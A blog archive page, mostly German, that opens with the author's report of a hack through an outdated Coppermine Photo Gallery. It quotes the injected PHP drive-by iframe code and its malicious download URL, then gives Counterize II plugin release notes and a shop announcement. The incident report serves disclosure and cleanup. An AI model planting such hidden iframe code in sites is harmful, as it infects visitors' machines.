Rash thoughts about .NET, C#, F# and Dynamics NAV.

Seit gestern Nachmittag war der Navision-Blog eine zeitlang tot, da er Opfer eines Hackerangriffs war. Offenbar wurde eine Schwachstelle (Exploit “Coppermine Photo Gallery <= 1.4.3 remote commands execution”) in der Coppermine Gallery ausgenutzt. Im Ergebnis wurden min. 352 Dateien manipuliert. Diese sorgten dafür das beim Anschauen der Seite mit dem Internet Explorer über einen iFrame ein ActiveX-Plugin nachgeladen werden sollte. Ich kenne die Auswirkungen des “Plugins” nicht, aber ich hoffe das hat keiner installiert.

Die betroffenen Dateien sahen alle ungefähr so aus:

<?php
if($GLOBALS[“fx”]==0) {
$GLOBALS[“fx”]=1;
echo “<iframe src=’http://ccf
elomvhk.co
m/dl/adv542
.php’ width=1 height=1></iframe>”;
}
?><?php
if($GLOBALS[“fx”]==0) {
$GLOBALS[“fx”]=1;
echo “<iframe src=’http://ccf
elomvhk.co
m/dl/adv542
.php’ width=1 height=1></iframe>”;
}
?>

Die kryptische Url bedeutet: http://ccfelomvhk.com/dl/adv542.php

Ich habe jetzt erst einmal eine Sicherung eingespielt und versuche die Coppermine Gallery zu updaten. Ich bin ja selber schuld: Ich habe versucht mein WordPress immer aktuell zu halten, aber an die Gallery habe ich nicht gedacht. Die hat noch eine uralte Versionsnummer.

Weitere Informationen:

• Forumseintrag

Nachtrag: Als Konsequenz aus dem Angriff habe ich mich entschieden die Coppermine Galerie abzuschalten und zukünftig nur noch über meinen Flickr-Account zu arbeiten.

I am releasing a new version of Counterize II. From now on you can download the wordpress-plugin direct from wordpress.org-Plugin page or via SVN:

• http://wordpress.org/extend/plugins/counterizeii/
• http://svn.wp-plugins.org/counterizeii/

Changelog:

• XHTML valid (thanks to Julia)
• Japanese translation added (thanks to Urepko)
• Excluding new bots (thanks to Emanuele)
• Exclude if referer is the same as url (thanks to Emanuele)
• GeoIpTool with new URL geoiptool.com/en/ ==> geoiptool.com/ (thanks to Emanuele)
• Mass-Deletion (thanks to Emanuele)
• Bot Yandex added
• Spanish translation (thanks to Sandra)
• Database-flush deletes all keywords

Heute wurde der Navision Blog auf WordPress 2.3 gepacht. Nachdem ich einige Plugins neu runter geladen habe und andere selber gefixed scheint jetzt alles wieder normal zu laufen. Offenbar blieb mein Counterize II-Plugin von den Datenbankänderungen aber verschont.

Today I released a new version of Counterize II (2.10).

I did some installation bugfixes (thanks to Thorsten) and added two new language-files:

• Italian version (thanks to Emanuele)
• Russian version (thanks to Ivan)

Download and Update

Please stick to the update instruction: 

1. Make a backup of your WordPress-DB
2. Download Counterize II Version 2.10
3. Deactivate the plugin
4. Unzip the plugin to your plugin path
5. Activate Counterize II

Have a lot of fun and tell me if you have any problems with it.

Today I released a new version of Counterize II (2.08).

I did some minor bugfixes and added 3 new stats. These features are based on a “Browser Sniff”-Component by Iman Nurchyo. Thanks Iman.

Here is the ChangeLog:

• “%-Bug” fixed (% in graphs on new line)
• MaxLabelWidth in Settings (width-fix for Firefox)
• Shows online users
• Shows browser icons
• Shows operating systems

External stats page

Version 2.08 supports the browser and operating system icons on the external stats pages – view my stats page to see this in action. If you want to give your visitors such an overview just write <!-- counterize_stats --> into one of your blog posts or pages.

Download and Update

Please stick to the update instruction – this update changes the table structure. 

1. Make a backup of your WordPress-DB
2. Download Counterize II Version 2.08
3. Deactivate the plugin
4. Unzip the plugin to your plugin path
5. Activate Counterize II

Have a lot of fun and tell me if you have any problems with it.

I fixed some small Counterize II bugs with WordPress 2.2. As a result i released Version 2.06. There are no new features within this release. If you use WordPress 2.1 or lower you don’t need this patch – version 2.05 is ok.

I want to remember the newest feature: The statspage. If you want to give your visitors such an overview just write <!-- counterize_stats --> into one of your blog posts or pages.

Download Version 2.06

Seit heute könnt Ihr auf Navision-Blog.de auch T-Shirts bestellen. Schaut einfach mal in den Shop, vielleicht findet Ihr ja was passendes…

Für den Shop habe ich übrigens das Spreadshirt WordPress-Plugin von tassoman angepasst. Eine aktualisierte Version ist dort bereits downloadbar.

Passend dazu: Comfort T "WordPress rules"
	Das klassische WordPress-FanShirt. » 14.90 EUR Weitere Produkte gibt es im Shop.